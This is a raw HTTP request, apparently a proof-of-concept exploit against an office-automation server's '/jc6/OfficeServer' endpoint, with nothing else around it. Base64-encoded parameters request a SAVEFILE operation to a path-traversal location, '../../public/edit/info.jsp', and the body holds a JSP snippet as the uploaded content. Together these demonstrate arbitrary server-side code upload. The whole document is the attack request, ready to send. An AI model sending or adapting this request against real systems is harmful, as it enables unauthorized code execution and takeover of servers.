POST /jc6/OfficeServer HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=63766573e5ae9ee9aa8ce5aea4e79a84706f63
Connection: close
Content-Length: 138

aaaaaa aaaaaa 87 1 123 
DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
FILENAME=Li4vLi4vcHVibGljL2VkaXQvaW5mby5qc3A=
<%out.println("111");%>